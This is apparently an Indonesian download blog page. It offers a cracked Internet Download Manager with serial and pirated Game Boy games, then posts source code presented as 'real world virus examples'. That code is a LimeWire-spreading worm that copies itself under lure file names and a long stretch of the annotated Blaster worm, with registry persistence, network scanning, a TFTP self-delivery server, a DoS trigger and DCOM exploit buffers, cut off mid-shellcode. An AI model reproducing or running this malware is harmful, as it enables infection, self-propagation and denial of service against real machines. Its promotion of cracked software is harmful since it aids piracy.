Download new idm in version 6.06 build 8 + Full Crack + Sn + Crack (Free)

Download new in version 6.06 build 8 + Full Crack + Sn + Crack (Free)

(Released: Jun 23, 2011)

Added support for Firefox 5
Resolved problems with foreign versions of Windows when a username contains hieroglyphs or other Unicode characters
Advanced browser integration has been significantly amended. Improved automatic interception of downloads, enhanced video stream detection in Chrome, Opera and in other browsers which are integrated with network driver
Fixed bugs ..


Silahkan
Download IDM 6.06 build 8 Full Crack + Sn + Crack (Free)

Enjoyy ...

Download Game Looney Tunes Dan Super Mario( Update Free)

Super Mario

Looney Tunes

Download Game Looney Tunes Dan Super Mario( Update Free)

Kedua Game ini tb share secara gratis untuk anda download ..
langsung aja ke tkp ...

Download Looney Tunes ( Free)
Download Super Mario For Pc ( Free)

Download Juga Visual Boynya Here ..

Cara memainkanya: ( Ini Khusus Untuk Looney Tunes
1. Buka Visual Game Boy
2. Klik File
3. Dan carilah File Game Looney Tunes yang anda sudah download tadi
4. Open, dan siap-sipalah untuk memainkanya.
enjoyy..

Contoh Virus Real Worlds ( Code)

Ini Saya Share Beberapa Contoh Real Worlds Virus ..
Langsung Ke Tkp Ya gan ...


Ini adalah virus Limewire, itu besar pada saat Limewire begitu besar bagi orang untuk menggunakan untuk mendapatkan porno, musik dan film. Semua dengan banyak kejutan lain yang cukup jelas bahwa Anda tidak ingin bergaul dengan satu malam di paris;) Ini hal yang lengkap di sini tapi Anda akan membutuhkan limewire untuk mendapatkan hal utama dari itu, seperti Babes.exe Gratis: D dengan ini virus itu tampaknya tidak menjadi hal yang akan menjadi begitu besar, tapi ketika itu lepas landas itu benar-benar melepas dengan remaja dan semua hal ini terjadi pada komputer mereka mereka menemukan setiap alasan tunggal kecuali Limewire. Seperti yang dapat Anda lihat di sana adalah Keygen.exe Anda dapat bayangkan adalah sebuah keygen. Namun ada, adalah masalah kecil dengan hal itu. Karena begitu besar Limewire dan begitu widly digunakan bahwa server untuk keygen dibanjiri setiap saat hari bahwa keygen ada gunanya. Ada cerita dari dev mencoba untuk menjual daftar keygen untuk seseorang tetapi ini tidak pernah dikonfirmasikan dengan benar.

Code :

#include
#include
#include
using namespace std;

int main (){
char system[MAX_PATH];
char pathtofile[MAX_PATH];
HMODULE GetModH = GetModuleHandle(NULL);

GetModuleFileName(GetModH,pathtofile,sizeof(pathtofile));
GetSystemDirectory(system,sizeof(system));

strcat(system,\"\\syseval.exe\");

CopyFile(pathtofile,system,false);

ofstream myfile;
myfile.open (\"C:\\spread.bat\");
myfile << \"@echo off\n\"; myfile << \"copy \\"C:\\WINDOWS\\system32\\syseval.exe\\" \\"C:\\Progra~1\\LimeWire\\Free Music.exe\\"\n\"; myfile << \"copy \\"C:\\WINDOWS\\system32\\syseval.exe\\" \\"C:\\Progra~1\\LimeWire\\ScreenSaver.exe\\"\n\"; myfile << \"copy \\"C:\\WINDOWS\\system32\\syseval.exe\\" \\"C:\\Progra~1\\LimeWire\\Naked!.exe\\"\n\"; myfile << \"copy \\"C:\\WINDOWS\\system32\\syseval.exe\\" \\"C:\\Progra~1\\LimeWire\\FREE$$$.exe\\"\n\"; myfile << \"copy \\"C:\\WINDOWS\\system32\\syseval.exe\\" \\"C:\\Progra~1\\LimeWire\\Hacking Ebook.exe\\"\n\"; myfile << \"copy \\"C:\\WINDOWS\\system32\\syseval.exe\\" \\"C:\\Progra~1\\LimeWire\\Fast Money.exe\\"\n\"; myfile << \"copy \\"C:\\WINDOWS\\system32\\syseval.exe\\" \\"C:\\Progra~1\\LimeWire\\LimewireCDCrack.exe\\"\n\"; myfile << \"copy \\"C:\\WINDOWS\\system32\\syseval.exe\\" \\"C:\\Progra~1\\LimeWire\\Keygen.exe\\"\n\"; myfile << \"copy \\"C:\\WINDOWS\\system32\\syseval.exe\\" \\"C:\\Progra~1\\LimeWire\\Money.exe\\"\n\"; myfile << \"copy \\"C:\\WINDOWS\\system32\\syseval.exe\\" \\"C:\\Progra~1\\LimeWire\\XXXDownloader.exe\\"\n\"; myfile << \"copy \\"C:\\WINDOWS\\system32\\syseval.exe\\" \\"C:\\Progra~1\\LimeWire\\Free Babes.exe\\"\n\"; myfile << \"copy \\"C:\\WINDOWS\\system32\\syseval.exe\\" \\"C:\\Progra~1\\LimeWire\\$$$.exe\\"\n\"; myfile << \"del %0\n\"; myfile << \"exit\n\"; myfile.close(); char Spreadstart[MAX_PATH]=\"C:\\spread.bat\"; ShellExecute(NULL,\"open\",Spreadstart,NULL,NULL,SW_MAXIMIZE); //Payload Here return 0; }


Ini adalah Blaster Worm, untungnya orang yang memberikan ini kepada saya memiliki komentar yang ditinggalkan di dalamnya. blaster Worm digunakan pada tahun 2010 sedikit untuk mencatat beberapa target besar. Hacker Cina dipekerjakan untuk menghancurkan perusahaan amerika ketika kotoran mulai turun. Pokoknya bekerja seperti ini hanya dimasukkan ke dalam istilah manusia. "Apa yang kau ingin aku melakukan sesuatu? Nah orang yang saya ingin mematikan sekarang, setiap orang kali Anda memulai aku sampai aku hanya akan mematikan lagi Bung berhenti berputar saya di Aku hanya akan mematikan dalam. menit. " Cacing blaster memberi peringatan itu akan ditutup pada 60 detik. Sekarang aku tahu kebanyakan orang tidak akan bisa mendapatkannya dihapus dalam 60 detik. Jika Anda bisa membuka task manager, proses dan mengikutinya ke folder dan menghapusnya maka Anda aman. Kebanyakan orang akan panik ketika hal ini terjadi dan akhirnya mengambil komputer mereka untuk profesional.

Code :

#include
#include /*IP_HDRINCL*/
#include /*InternetGetConnectedState*/
#include

#pragma comment (lib, \"ws2_32.lib\")
#pragma comment (lib, \"wininet.lib\")
#pragma comment (lib, \"advapi32.lib\")


/*
* These strings aren't used in the worm, Buford put them here
* so that whitehat researchers would discover them.
*/
const char msg1[]=\"I just want to say LOVE YOU SAN!!\";
const char msg2[]=\"billy gates why do you make this possible ?\"
\" Stop making money and fix your software!!\";


/*
* Buford probably put the worm name as a \"define\" at the top
* of his program so that he could change the name at any time.
* 2003-09-29: This is the string that Parson changed.
*/
#define MSBLAST_EXE \"msblast.exe\"

/*
* MS-RPC/DCOM runs over port 135.
* DEFENSE: firewalling port 135 will prevent systems from
* being exploited and will hinder the spread of this worm.
*/
#define MSRCP_PORT_135 135

/*
* The TFTP protocol is defined to run on port 69. Once this
* worm breaks into a victim, it will command it to download
* the worm via TFTP. Therefore, the worms briefly runs a
* TFTP service to deliver that file.
* DEFENSE: firewalling 69/udp will prevent the worm from
* fully infected a host.
*/
#define TFTP_PORT_69 69

/*
* The shell-prompt is established over port 4444. The
* exploit code (in the variable 'sc') commands the victim
* to \"bind a shell\" on this port. The exploit then connects
* to that port to send commands, such as TFTPing the
* msblast.exe file down and launching it.
* DEFENSE: firewalling 4444/tcp will prevent the worm from
* spreading.
*/
#define SHELL_PORT_4444 4444


/*
* A simple string to hold the current IP address
*/
char target_ip_string[16];

/*
* A global variable to hold the socket for the TFTP service.
*/
int fd_tftp_service;

/*
* Global flag to indicate this thread is running. This
* is set when the thread starts, then is cleared when
* the thread is about to end.
* This demonstrates that Buford isn't confident with
* multi-threaded programming -- he should just check
* the thread handle.
*/
int is_tftp_running;

/*
* When delivering the worm file to the victim, it gets the
* name by querying itself using GetModuleFilename(). This
* makes it easier to change the filename or to launch the
* worm. */
char msblast_filename[256+4];

int ClassD, ClassC, ClassB, ClassA;

int local_class_a, local_class_b;

int winxp1_or_win2k2;


ULONG WINAPI blaster_DoS_thread(LPVOID);
void blaster_spreader();
void blaster_exploit_target(int fd, const char *victim_ip);
void blaster_send_syn_packet(int target_ip, int fd);


/***************************************************************
* This is where the 'msblast.exe' program starts running
***************************************************************/
void main(int argc, char *argv[])
{
WSADATA WSAData;
char myhostname[512];
char daystring[3];
char monthstring[3];
HKEY hKey;
int ThreadId;
register unsigned long scan_local=0;

/*
* Create a registry key that will cause this worm
* to run every time the system restarts.
* DEFENSE: Slammer was \"memory-resident\" and could
* be cleaned by simply rebooting the machine.
* Cleaning this worm requires this registry entry
* to be deleted.
*/
RegCreateKeyEx(
/*hKey*/ HKEY_LOCAL_MACHINE,
/*lpSubKey*/ \"SOFTWARE\\Microsoft\\Windows\\\"
\"CurrentVersion\\Run\",
/*Reserved*/ 0,
/*lpClass*/ NULL,
/*dwOptions*/ REG_OPTION_NON_VOLATILE,
/*samDesired */ KEY_ALL_ACCESS,
/*lpSecurityAttributes*/ NULL,
/*phkResult */ &hKey,
/*lpdwDisposition */ 0);
RegSetValueExA(
hKey,
\"windows auto update\",
0,
REG_SZ,
MSBLAST_EXE,
50);
RegCloseKey(hKey);


/*
* Make sure this isn't a second infection. A common problem
* with worms is that they sometimes re-infect the same
* victim repeatedly, eventually crashing it. A crashed
* system cannot spread the worm. Therefore, worm writers
* now make sure to prevent reinfections. The way Blaster
* does this is by creating a system \"global\" object called
* \"BILLY\". If another program in the computer has already
* created \"BILLY\", then this instance won't run.
* DEFENSE: this implies that you can remove Blaster by
* creating a mutex named \"BILLY\". When the computer
* restarts, Blaster will falsely believe that it has
* already infected the system and will quit.
*/
CreateMutexA(NULL, TRUE, \"BILLY\");
if (GetLastError() == ERROR_ALREADY_EXISTS)
ExitProcess(0);

/*
* Windows systems requires \"WinSock\" (the network API layer)
* to be initialized. Note that the SYNflood attack requires
* raw sockets to be initialized, which only works in
* version 2.2 of WinSock.
* BUFORD: The following initialization is needlessly
* complicated, and is typical of programmers who are unsure
* of their knowledge of sockets..
*/
if (WSAStartup(MAKEWORD(2,2), &WSAData) != 0
&& WSAStartup(MAKEWORD(1,1), &WSAData) != 0
&& WSAStartup(1, &WSAData) != 0)
return;

/*
* The worm needs to read itself from the disk when
* transferring to the victim. Rather than using a hard-coded
* location, it discovered the location of itself dynamically
* through this function call. This has the side effect of
* making it easier to change the name of the worm, as well
* as making it easier to launch it.
*/
GetModuleFileNameA(NULL, msblast_filename,
sizeof(msblast_filename));

/*
* When the worm infects a dialup machine, every time the user
* restarts their machine, the worm's network communication
* will cause annoying 'dial' popups for the user. This will
* make them suspect their machine is infected.
* The function call below makes sure that the worm only
* starts running once the connection to the Internet
* has been established and not before.
* BUFORD: I think Buford tested out his code on a machine
* and discovered this problem. Even though much of the
* code indicates he didn't spend much time on
* testing his worm, this line indicates that he did
* at least a little bit of testing.
*/
while (!InternetGetConnectedState(&ThreadId, 0))
Sleep (20000); /*wait 20 seconds and try again */

/*
* Initialize the low-order byte of target IP address to 0.
*/
ClassD = 0;

/*
* The worm must make decisions \"randomly\": each worm must
* choose different systems to infect. In order to make
* random choices, the programmer must \"seed\" the random
* number generator. The typical way to do this is by
* seeding it with the current timestamp.
* BUFORD: Later in this code you'll find that Buford calls
* 'srand()' many times to reseed. This is largely
* unnecessary, and again indicates that Buford is not
* confident in his programming skills, so he constantly
* reseeds the generator in order to make extra sure he
* has gotten it right.
*/
srand(GetTickCount());

/*
* This initializes the \"local\" network to some random
* value. The code below will attempt to figure out what
* the true local network is -- but just in case it fails,
* the initialization fails, using random values makes sure
* the worm won't do something stupid, such as scan the
* network around 0.0.0.0
*/
local_class_a = (rand() % 254)+1;
local_class_b = (rand() % 254)+1;

/*
* This discovers the local IP address used currently by this
* victim machine. Blaster randomly chooses to either infect
* just the local ClassB network, or some other network,
* therefore it needs to know the local network.
* BUFORD: The worm writer uses a complex way to print out

* the IP address into a string, then parse it back again
* to a number. This demonstrates that Buford is fairly
* new to C programming: he thinks in terms of the printed
* representation of the IP address rather than in its
* binary form.
*/
if (gethostname(myhostname, sizeof(myhostname)) != -1) {
HOSTENT *p_hostent = gethostbyname(myhostname);

if (p_hostent != NULL && p_hostent->h_addr != NULL) {
struct in_addr in;
const char *p_addr_item;

memcpy(&in, p_hostent->h_addr, sizeof(in));
sprintf(myhostname, \"%s\", inet_ntoa(in));

p_addr_item = strtok(myhostname, \".\");
ClassA = atoi(p_addr_item);

p_addr_item = strtok(0, \".\");
ClassB = atoi(p_addr_item);

p_addr_item = strtok(0, \".\");
ClassC = atoi(p_addr_item);

if (ClassC > 20) {
/* When starting from victim's address range,
* try to start a little bit behind. This is
* important because the scanning logic only
* move forward. */
srand(GetTickCount());
ClassC -= (rand() % 20);
}
local_class_a = ClassA;
local_class_b = ClassB;
scan_local = TRUE;
}
}


/*
* This chooses whether Blaster will scan just the local
* network (40% chance) or a random network (60% chance)
*/
srand(GetTickCount());
if ((rand() % 20) < 12) scan_local = FALSE; /* * The known exploits require the hacker to indicate whether * the victim is WinXP or Win2k. The worm has to guess. The * way it guesses is that it chooses randomly. 80% of the time * it will assume that all victims are WinXP, and 20% of the * time it will assume all victims are Win2k. This means that * propogation among Win2k machines will be slowed down by * the fact Win2k machines are getting DoSed faster than they * are getting exploited. */ winxp1_or_win2k2 = 1; if ((rand()%10) > 7)
winxp1_or_win2k2 = 2;

/*
* If not scanning locally, then choose a random IP address
* to start with.
* BUG: this worm choose bad ranges above 224. This will
* cause a bunch of unnecessary multicast traffic. Weird
* multicast traffic has historically been an easy way of
* detecting worm activity.
*/
if (!scan_local) {
ClassA = (rand() % 254)+1;
ClassB = (rand() % 254);
ClassC = (rand() % 254);
}


/*
* Check the date so that when in the certain range, it will
* trigger a DoS attack against Micosoft. The following
* times will trigger the DoS attack:
* Aug 16 through Aug 31
* Spt 16 through Spt 30
* Oct 16 through Oct 31
* Nov 16 through Nov 30
* Dec 16 through Dec 31
* This applies to all years, and is based on local time.
* FAQ: The worm is based on \"local\", not \"global\" time.
* That means the DoS attack will start from Japan,
* then Asia, then Europe, then the United States as the
* time moves across the globe.
*/
#define MYLANG MAKELANGID(LANG_ENGLISH, SUBLANG_DEFAULT)
#define LOCALE_409 MAKELCID(MYLANG, SORT_DEFAULT)
GetDateFormat( LOCALE_409,
0,
NULL, /*localtime, not GMT*/
\"d\",
daystring,
sizeof(daystring));
GetDateFormat( LOCALE_409,
0,
NULL, /*localtime, not GMT*/
\"M\",
monthstring,
sizeof(monthstring));
if (atoi(daystring) > 15 && atoi(monthstring) > 8)
CreateThread(NULL, 0,
blaster_DoS_thread,
0, 0, &ThreadId);

/*
* As the final task of the program, go into worm mode
* trying to infect systems.
*/
for (;;)
blaster_spreader();

/*
* It'll never reach this point, but in theory, you need a
* WSACleanup() after a WSAStartup().

*/
WSACleanup();
}



/*
* This will be called from CreateThread in the main worm body
* right after it connects to port 4444. After the thread is
* started, it then sends the string \"
* tftp -i %d.%d.%d.%d GET msblast.exe\" (where the %ds represents
* the IP address of the attacker).
* Once it sends the string, it then waits for 20 seconds for the
* TFTP server to end. If the TFTP server doesn't end, it calls
* TerminateThread.
*/
DWORD WINAPI blaster_tftp_thread(LPVOID p)
{
/*
* This is the protocol format of a TFTP packet. This isn't
* used in the code -- I just provide it here for reference
*/
struct TFTP_Packet
{
short opcode;
short block_id;
char data[512];
};

char reqbuf[512]; /* request packet buffer */
struct sockaddr_in server; /* server-side port number */
struct sockaddr_in client; /* client IP address and port */
int sizeof_client; /* size of the client structure*/
char rspbuf[512]; /* response packet */

static int fd; /* the socket for the server*/
register FILE *fp;
register block_id;
register int block_size;

/* Set a flag indicating this thread is running. The other
* thread will check this for 20 seconds to see if the TFTP
* service is still alive. If this thread is still alive in
* 20 seconds, it will be killed.
*/
is_tftp_running = TRUE; /*1 == TRUE*/

/* Create a server-socket to listen for UDP requests on */
fd = socket(AF_INET, SOCK_DGRAM, 0);
if (fd == SOCKET_ERROR)
goto closesocket_and_exit;

/* Bind the socket to 69/udp */
memset(&server, 0, sizeof(server));
server.sin_family = AF_INET;
server.sin_port = htons(TFTP_PORT_69);
server.sin_addr.s_addr = 0; /*TFTP server addr = */
if (bind(fd, (struct sockaddr*)&server, sizeof(server)) != 0)
goto closesocket_and_exit;

/* Receive a packet, any packet. The contents of the received
* packet are ignored. This means, BTW, that a defensive
* \"worm-kill\" could send a packet from somewhere else. This
* will cause the TFTP server to download the msblast.exe
* file to the wrong location, preventing the victim from
* doing the download. */
sizeof_client = sizeof(client);
if (recvfrom(fd, reqbuf, sizeof(reqbuf), 0,
(struct sockaddr*)&client, &sizeof_client) <= 0) goto closesocket_and_exit; /* The TFTP server will respond with many 512 byte blocks * until it has completely sent the file; each block must * have a unique ID, and each block must be acknowledged. * BUFORD: The worm ignores TFTP ACKs. This is probably why * the worm restarts the TFTP service rather than leaving it * enabled: it essentially flushes all the ACKs from the * the incoming packet queue. If the ACKs aren't flushed, * the worm will incorrectly treat them as TFTP requests. */ block_id = 0; /* Open this file. GetModuleFilename was used to figure out * this filename. */ fp = fopen(msblast_filename, \"rb\"); if (fp == NULL) goto closesocket_and_exit; /* Continue sending file fragments until none are left */ for (;;) { block_id++; /* Build TFTP header */ #define TFTP_OPCODE_DATA 3 *(short*)(rspbuf+0) = htons(TFTP_OPCODE_DATA); *(short*)(rspbuf+2)= htons((short)block_id); /* Read next block of data (about 12 blocks total need * to be read) */ block_size = fread(rspbuf+4, 1, 512, fp); /* Increase the effective length to include the TFTP * head built above */ block_size += 4; /* Send this block */ if (sendto(fd, (char*)&rspbuf, block_size, 0, (struct sockaddr*)&client, sizeof_client) <= 0) break; /* Sleep for a bit. * The reason for this is because the worm doesn't care * about retransmits -- it therefore must send these * packets slow enough so congestion doesn't drop them. * If it misses a packet, then it will DoS the victim * without actually infecting it. Worse: the intended * victim will continue to send packets, preventing the * worm from infecting new systems because the * requests will misdirect TFTP. This design is very * bad, and is my bet as the biggest single factor * that slows down the worm. */ Sleep(900); /* File transfer ends when the last block is read, which * will likely be smaller than a full-sized block*/ if (block_size != sizeof(rspbuf)) { fclose(fp); fp = NULL; break; } } if (fp != NULL) fclose(fp); closesocket_and_exit: /* Notify that the thread has stopped, so that the waiting * thread can continue on */ is_tftp_running = FALSE; closesocket(fd); ExitThread(0); return 0; } /* * This function increments the IP address. * BUFORD: This conversion from numbers, to strings, then back * to number is overly complicated. Experienced programmers * would simply store the number and increment it. This shows * that Buford does not have much experience work with * IP addresses. */ void blaster_increment_ip_address() { for (;;) { if (ClassD <= 254) { ClassD++; return; } ClassD = 0; ClassC++; if (ClassC <= 254) return; ClassC = 0; ClassB++; if (ClassB <= 254) return; ClassB = 0; ClassA++; if (ClassA <= 254) continue; ClassA = 0; return; } } /* * This is called from the main() function in an * infinite loop. It scans the next 20 addresses, * then exits. */ void blaster_spreader() { fd_set writefds; register int i; struct sockaddr_in sin; struct sockaddr_in peer; int sizeof_peer; int sockarray[20]; int opt = 1; const char *victim_ip; /* Create the beginnings of a \"socket-address\" structure that * will be used repeatedly below on the 'connect()' call for * each socket. This structure specified port 135, which is * the port used for RPC/DCOM. */ memset(&sin, 0, sizeof(sin)); sin.sin_family = AF_INET; sin.sin_port = htons(MSRCP_PORT_135); /* Create an array of 20 socket descriptors */ for (i=0; i<20; i++) { sockarray[i] = socket(AF_INET, SOCK_STREAM, 0); if (sockarray[i] == -1) return; ioctlsocket(sockarray[i], FIONBIO , &opt); } /* Initiate a \"non-blocking\" connection on all 20 sockets * that were created above. * FAQ: Essentially, this means that the worm has 20 * \"threads\" -- even though they aren't true threads. */ for (i=0; i<20; i++) { int ip; blaster_increment_ip_address(); sprintf(target_ip_string, \"%i.%i.%i.%i\", ClassA, ClassB, ClassC, ClassD); ip = inet_addr(target_ip_string); if (ip == -1) return; sin.sin_addr.s_addr = ip; connect(sockarray[i],(struct sockaddr*)&sin,sizeof(sin)); } /* Wait 1.8-seconds for a connection. * BUG: this is often not enough, especially when a packet * is lost due to congestion. A small timeout actually makes * the worm slower than faster */ Sleep(1800); /* Now test to see which of those 20 connections succeeded. * BUFORD: a more experienced programmer would have done * a single 'select()' across all sockets rather than * repeated calls for each socket. */ for (i=0; i<20; i++) { struct timeval timeout; int nfds; timeout.tv_sec = 0; timeout.tv_usec = 0; nfds = 0; FD_ZERO(&writefds); FD_SET((unsigned)sockarray[i], &writefds); if (select(0, NULL, &writefds, NULL, &timeout) != 1) { closesocket(sockarray[i]); } else { sizeof_peer = sizeof(peer); getpeername(sockarray[i], (struct sockaddr*)&peer, &sizeof_peer); victim_ip = inet_ntoa(peer.sin_addr); /* If connection succeeds, exploit the victim */ blaster_exploit_target(sockarray[i], victim_ip); closesocket(sockarray[i]); } } } /* * This is where the victim is actually exploited. It is the same * exploit as created by xfocus and altered by HDMoore. * There are a couple of differences. The first is that the in * those older exploits, this function itself would create the * socket and connect, whereas in Blaster, the socket is already * connected to the victim via the scanning function above. The * second difference is that the packets/shellcode blocks are * declared as stack variables rather than as static globals. * Finally, whereas the older exploits give the hacker a * \"shell prompt\", this one automates usage of the shell-prompt * to tell the victim to TFTP the worm down and run it. */ void blaster_exploit_target(int sock, const char *victim_ip) { /* These blocks of data are just the same ones copied from the * xfocus exploit prototype. Whereas the original exploit * declared these as \"static\" variables, Blaster declares * these as \"stack\" variables. This is because the xfocus * exploit altered them -- they must be reset back to their * original values every time. */ unsigned char bindstr[]={ 0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00, 0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00, 0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00, 0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00, 0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00}; unsigned char request1[]={ 0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0xE8,0x03 ,0x00,0x00,0xE5,0x00,0x00,0x00,0xD0,0x03,0x00,0x00,0x01,0x00,0x04,0x00,0x05,0x00 ,0x06,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x32,0x24,0x58,0xFD,0xCC,0x45 ,0x64,0x49,0xB0,0x70,0xDD,0xAE,0x74,0x2C,0x96,0xD2,0x60,0x5E,0x0D,0x00,0x01,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x5E,0x0D,0x00,0x02,0x00,0x00,0x00,0x7C,0x5E ,0x0D,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x80,0x96,0xF1,0xF1,0x2A,0x4D ,0xCE,0x11,0xA6,0x6A,0x00,0x20,0xAF,0x6E,0x72,0xF4,0x0C,0x00,0x00,0x00,0x4D,0x41 ,0x52,0x42,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00 ,0x00,0x00,0xA8,0xF4,0x0B,0x00,0x60,0x03,0x00,0x00,0x60,0x03,0x00,0x00,0x4D,0x45 ,0x4F,0x57,0x04,0x00,0x00,0x00,0xA2,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00 ,0x00,0x00,0x00,0x00,0x00,0x46,0x38,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00 ,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,0x30,0x03,0x00,0x00,0x28,0x03 ,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0xC8,0x00 ,0x00,0x00,0x4D,0x45,0x4F,0x57,0x28,0x03,0x00,0x00,0xD8,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x02,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xC4,0x28,0xCD,0x00,0x64,0x29 ,0xCD,0x00,0x00,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0xB9,0x01,0x00,0x00,0x00,0x00 ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAB,0x01,0x00,0x00,0x00,0x00 ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA5,0x01,0x00,0x00,0x00,0x00 ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA6,0x01,0x00,0x00,0x00,0x00 ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA4,0x01,0x00,0x00,0x00,0x00 ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAD,0x01,0x00,0x00,0x00,0x00 ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAA,0x01,0x00,0x00,0x00,0x00 ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x07,0x00,0x00,0x00,0x60,0x00 ,0x00,0x00,0x58,0x00,0x00,0x00,0x90,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x20,0x00 ,0x00,0x00,0x78,0x00,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10 ,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x50,0x00,0x00,0x00,0x4F,0xB6,0x88,0x20,0xFF,0xFF ,0xFF,0xFF,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10 ,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x48,0x00,0x00,0x00,0x07,0x00,0x66,0x00,0x06,0x09 ,0x02,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x10,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x78,0x19,0x0C,0x00,0x58,0x00,0x00,0x00,0x05,0x00,0x06,0x00,0x01,0x00 ,0x00,0x00,0x70,0xD8,0x98,0x93,0x98,0x4F,0xD2,0x11,0xA9,0x3D,0xBE,0x57,0xB2,0x00 ,0x00,0x00,0x32,0x00,0x31,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x80,0x00 ,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00,0x18,0x43,0x14,0x00,0x00,0x00,0x00,0x00,0x60,0x00 ,0x00,0x00,0x60,0x00,0x00,0x00,0x4D,0x45,0x4F,0x57,0x04,0x00,0x00,0x00,0xC0,0x01 ,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x3B,0x03 ,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00 ,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x01,0x00,0x81,0xC5,0x17,0x03,0x80,0x0E ,0xE9,0x4A,0x99,0x99,0xF1,0x8A,0x50,0x6F,0x7A,0x85,0x02,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x30,0x00 ,0x00,0x00,0x78,0x00,0x6E,0x00,0x00,0x00,0x00,0x00,0xD8,0xDA,0x0D,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x2F,0x0C,0x00,0x00,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x00,0x46,0x00 ,0x58,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x10,0x00 ,0x00,0x00,0x30,0x00,0x2E,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x68,0x00 ,0x00,0x00,0x0E,0x00,0xFF,0xFF,0x68,0x8B,0x0B,0x00,0x02,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00}; unsigned char request2[]={ 0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00 ,0x00,0x00,0x5C,0x00,0x5C,0x00}; unsigned char request3[]={ 0x5C,0x00 ,0x43,0x00,0x24,0x00,0x5C,0x00,0x31,0x00,0x32,0x00,0x33,0x00,0x34,0x00,0x35,0x00 ,0x36,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00 ,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00 ,0x2E,0x00,0x64,0x00,0x6F,0x00,0x63,0x00,0x00,0x00}; unsigned char sc[]= \"\x46\x00\x58\x00\x4E\x00\x42\x00\x46\x00\x58\x00\" \"\x46\x00\x58\x00\x4E\x00\x42\x00\x46\x00\x58\x00\x46\x00\x58\x00\" \"\x46\x00\x58\x00\x46\x00\x58\x00\" \"\xff\xff\xff\xff\" /* return address */ 